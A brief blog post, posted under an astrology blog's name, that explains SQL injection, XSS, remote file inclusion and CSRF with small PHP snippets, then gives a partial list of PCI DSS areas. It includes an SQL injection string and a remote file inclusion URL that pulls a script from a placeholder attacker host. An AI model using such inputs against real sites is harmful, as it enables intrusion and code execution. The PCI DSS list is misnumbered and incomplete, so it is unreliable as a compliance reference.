WEB APPLICATION VULNERABILITIES IN ALL LANGUAGES PHP,JAVA,ASP,PYTHON,PERl

Jyotishgher Astrology
By -Jyotishgher Astrology
9:18 PM
0
WEB APPLICATION VULNERABILITIES IN ALL LANGUAGES 

                    PHP,JAVA,ASP,PYTHON,PERL ...


Web application vulnerabilities are typically the result of a lack of input/output sanitization, which are often exploited to either manipulate source code or gain unauthorized access.
Such vulnerabilities enable the use of different attack vectors, including:




  • SQL Injection – Occurs when a perpetrator uses malicious SQL code to manipulate a backend database so it reveals information. Consequences include the unauthorized viewing of lists, deletion of tables and unauthorized administrative access.

    1.    $stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) 
    VALUES (:nam, :add, :cit)");
    $stmt->bindParam(':nam', $txtNam);
    $stmt->bindParam(':add', $txtAdd);
    $stmt->bindParam(':cit', $txtCit);
    $stmt->execute();
    OR
    $name_bad = "' OR 1'";

    $name_bad = mysql_real_escape_string($name_bad);


    • Cross-site Scripting (XSS) – XSS is an injection attack targeting users in order to access accounts, activate Trojans or modify page content. Stored XSS occurs when malicious code is injected directly into an application. Reflected XSStakes place when malicious script is reflected off of an application onto a user’s browser.

           Input Validation

             $x= htmlentities(post data)
        Echo $x;


    • Remote File Inclusion – A hacker uses this type of attack to remotely inject a file onto a web application server. This can result in the execution of malicious scripts or code within the application, as well as data theft or manipulation.
    http://victimsite.com/index.php?page=home
    http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt


    • Cross-site Request Forgery (CSRF) – An attack that could result in an unsolicited transfer of funds, changed passwords or data theft. It’s caused when a malicious web application makes a user’s browser perform an unwanted action in a site to which a user is logged on. CSRF attacks can be performed over GET or POST requests.
     place it in the links of the page -- which would look like this : http://mysite.com/vote/30?token=AZERTYUHQNWGST
    ·     
                      Web application security solutions and enforced security procedures, such as PCI Data         Security Standard (PCI DSS) certification, should be deployed to avoid such threats.
    ·             REQUIREMENTS:
             Area 1 – Build and Maintain a Secure Network
    • – Install a firewall to protect your environment.
    • – Do not use vendor default profiles or passwords.
             Area 2 – Maintain a Vulnerability Management Program
    • – Use and regularly update anti-virus software.
    • – Develop and maintain secure systems and applications.
             Area 4

    – Assign a unique ID to each person with computer access.
    • Area 5 – Regularly Monitor and Test Networks.
      • Requirement 10 – Track and monitor/log all access to network resources and cardholder data.
      • Requirement 11 – Regularly test security systems and processes.
    • Area 6 – Maintain an Information Security Policy.
      • Requirement 12 – Maintain a policy that addresses information security.

    ALL THESE PARAMETERS MUST BE IMPLEMENTED IF YOU ARE LAUNCHING A WEBSITE OR NEED TO DO AUDIT OF YOUR WEBSITE
    Tags:
    Jyotishgher Astrology

    Jyotishgher Astrology

    Place your burden at the feet of the Lord of the Universe who accomplishes everything. Remain all the time steadfast in the heart, in the Transcendental Absolute. God knows the past, present and future. He will determine the future for you and accomplish the work. What is to be done will be done at the proper time. Don’t worry. Abide in the heart and surrender your acts to the divine

      You Might Like

      Show more
      CSRF

      Post a Comment

      0Comments

      Post a Comment (0)
      Share to other apps
      Copy Post Link